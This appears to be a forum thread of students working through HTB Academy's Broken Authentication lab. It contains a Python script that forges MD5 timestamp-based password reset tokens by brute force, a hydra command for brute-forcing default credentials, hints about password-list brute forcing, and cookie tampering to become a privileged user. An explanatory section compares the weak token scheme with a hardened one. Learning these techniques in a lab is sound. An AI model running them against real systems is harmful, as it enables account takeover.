BROKEN AUTHENTICATION module | HTB Academy

I'm stuck on the "Predictable Reset Token" section!
Who can guide me through practicing it, please? Thanks

question 1: Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of ±1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the “Check” button. What is the flag?

Hint: Convert the displayed date to epoch time in milliseconds and use it in the script you will create.

I know the token is generated from "username and time" and then hashed with MD5, like the Apache OpenMeetings bug (CVE-2016-0783),
but I convert the datetime to epoch time, and I still get the wrong token!

I’m with you. I would love some help with this

I'm banging my head against the wall with this one. I need serious help. I made an MD5 hash of the username + the time in epoch milliseconds just like the hint says, and it doesn't match the displayed token. Does anyone have a hint?

Does anyone have a hint, please?

I am now at the same point. Anybody was able to progress?

I just skipped it. I tried every combo of htbstudent with every permutation of the epoch time, tried switching them, tried putting a colon in between them, switching them. I wrote multiple Python scripts doing random things like taking date.date() and datetime.datetime(…).timestamp() * 1000. I can't get it to work.

Use a Python script! `now = round(time.time() * 1000)` is the right way, and don't forget the ±1 second for the htbadmin token!

I solved it! The key is to brute-force every possible timestamp within that 2-second window.

I still can't get it. Here is my script. Where did I go wrong?

```python
#!/usr/bin/python3
import time
import requests
from hashlib import md5

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Content-Type": "application/x-www-form-urlencoded",
}
url = "http://46.101.14.69:30865/question1/"

# Ask the server to create the htbuser reset token.
data = "submit=htbuser"
res1 = requests.post(url, headers=headers, data=data)

# Local clock in epoch milliseconds, taken right after the request.
mytime = round(time.time() * 1000)
user = "htbadmin"

# Try every millisecond in a +/-1 s window around mytime.
# Loop variable renamed from `time` so it no longer shadows the time module.
for t in range(mytime - 1000, mytime + 1000):
    raw_data = user + str(t)
    token = md5(raw_data.encode()).hexdigest()
    # f-string prefix was missing in the original, so the literal text
    # "{token}" was being submitted instead of the hash.
    data = f"token={token}&submit=check"
    res = requests.post(url, data=data, headers=headers)
    if "Wrong token." in res.text:
        print(f"checking: {t}")
        continue
    print(res.text)
    break
```

You have misunderstood how the token for "htbadmin" is generated. When you click on "create reset token for htbuser", let's say the timestamp at this moment is T; then the server generates the token for "htbadmin" using a timestamp within the range [T-1000, T+1000]. Therefore, you are supposed to use the time displayed on the webpage instead of the current timestamp. PS. There is another issue within your code that could stop you from finding the correct token. I will leave it for you to figure out for now.

Some one solve Broken Authentication Skill Assessment?

@OceanicSix said:
> You have misunderstood how the token for "htbadmin" is generated.
>
> When you click on "create reset token for htbuser", let's say the timestamp at this moment is T, then the server generates the token for "htbadmin" using a timestamp within the range of [T-1000, T+1000]
>
> Therefore, you are supposed to use the time displayed on the webpage instead of the current timestamp.
>
> PS. There is another issue within your code that could stop you from finding the correct token. I will leave it for you to figure out for now

Thanks! The only problem is that the time displayed on the page is the exact same time as the header (which is why I used it). I'll look through the rest of my code for the other problem.

The key to question 1 is not using the time as printed, but converting it to your own local time.
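The thread above describes why the token is predictable: it is `md5(username + epoch_ms)`, and the generation time is known to within ±1 second, so there are only 2001 candidates. The following is an added example, not code from the thread or from HTB Academy, showing that weak scheme beside a hardened reset-token design (random token, stored only as a hash, single use, expiring, compared in constant time). `ResetTokenStore`, `TOKEN_TTL_SECONDS` and the 15-minute expiry are assumptions chosen for the example.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

# --- The weak scheme discussed in the thread (OpenMeetings-style) ---------

def weak_reset_token(username: str, epoch_ms: int) -> str:
    """Token derived entirely from public inputs: username + millisecond
    timestamp. Anyone who knows roughly when it was issued can recompute it."""
    return hashlib.md5(f"{username}{epoch_ms}".encode()).hexdigest()


def weak_token_search_space(window_ms: int = 1000) -> int:
    """Number of candidates left when the issue time is known to within
    +/-window_ms. For +/-1 s that is 2001, trivially enumerable."""
    return 2 * window_ms + 1


# --- Hardened design (assumed for this example, not from the page) --------

TOKEN_TTL_SECONDS = 15 * 60  # assumption: tokens expire after 15 minutes


class ResetTokenStore:
    """Server-side store for password reset tokens.

    - token comes from the OS CSPRNG (256 bits), not from time/username
    - only sha256(token) is persisted, so a database leak cannot be replayed
    - tokens are single use and expire
    - comparison is constant time
    """

    def __init__(self) -> None:
        # username -> (sha256 hex of token, expiry as epoch seconds)
        self._pending: Dict[str, Tuple[str, float]] = {}

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, username: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 32 random bytes, URL-safe text
        self._pending[username] = (self._digest(token), now + TOKEN_TTL_SECONDS)
        return token  # delivered to the user out of band, never logged

    def verify(self, username: str, token: str, now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        entry = self._pending.get(username)
        if entry is None:
            return False
        stored_digest, expires_at = entry
        if now > expires_at:
            del self._pending[username]  # expired: discard
            return False
        if not hmac.compare_digest(stored_digest, self._digest(token)):
            return False
        del self._pending[username]  # valid: consume so it cannot be reused
        return True


if __name__ == "__main__":
    # Constructed demonstration values.
    print("weak token:", weak_reset_token("htbadmin", 1700000000000))
    print("candidates in a +/-1 s window:", weak_token_search_space())
    store = ResetTokenStore()
    tok = store.issue("htbadmin")
    print("hardened token verifies once:", store.verify("htbadmin", tok))
    print("replay rejected:", store.verify("htbadmin", tok))
```

The contrast is the point: with the weak scheme the "secret" is a function of two values the attacker already knows, so hashing adds no entropy; with the hardened store the token's unpredictability comes from `secrets`, and the hashed storage, expiry and single-use handling limit the damage if a token or the database is ever exposed.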

I'm stuck on "Default Credentials"

Question:

> Inspect the login page and perform a bruteforce attack. What is the valid username?

```
hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 46.101.23.188 -s 31420 http-post-form '/:Username=^USER^&Password=^PASS^:F=<button type="submit"'
```

I don’t know what the problem is.

Is the error in the list or in a parameter?

Can anyone give me a hint?

Thanks

"CTRL + U" to view the page source, and google the title information!

Working on it but not resolved for a few days. Just found that there are some old accounts as mentioned on the "Support" page. I guess the old accounts have less security control and am going to try them. If you have resolved the question, do you mind PMing me some hints?

Thanks a lot.

I got the password for some support account, but when I log in with that account I do not see any admin panel access. The only difference I see is a note that there is no ticket assigned to the support user. Using a small directory brute force, there is no extra folder or page found. I believe this is the right direction.

We completed this module; if you guys need help with it, just text me.

Working on the final assessment here.
I figure that there is an account username that can be targeted.
So I prepared a list of passwords from rockyou.txt that fit the password criteria (20 characters, starting with uppercase, ending with a digit, etc.).
Bruteforcing the password does not work though, due to timeout.

Did you manually try all the passwords?

I found some other high-privilege user. With the cookie format of support, I can change my cookie to make myself the privileged user and get the flag.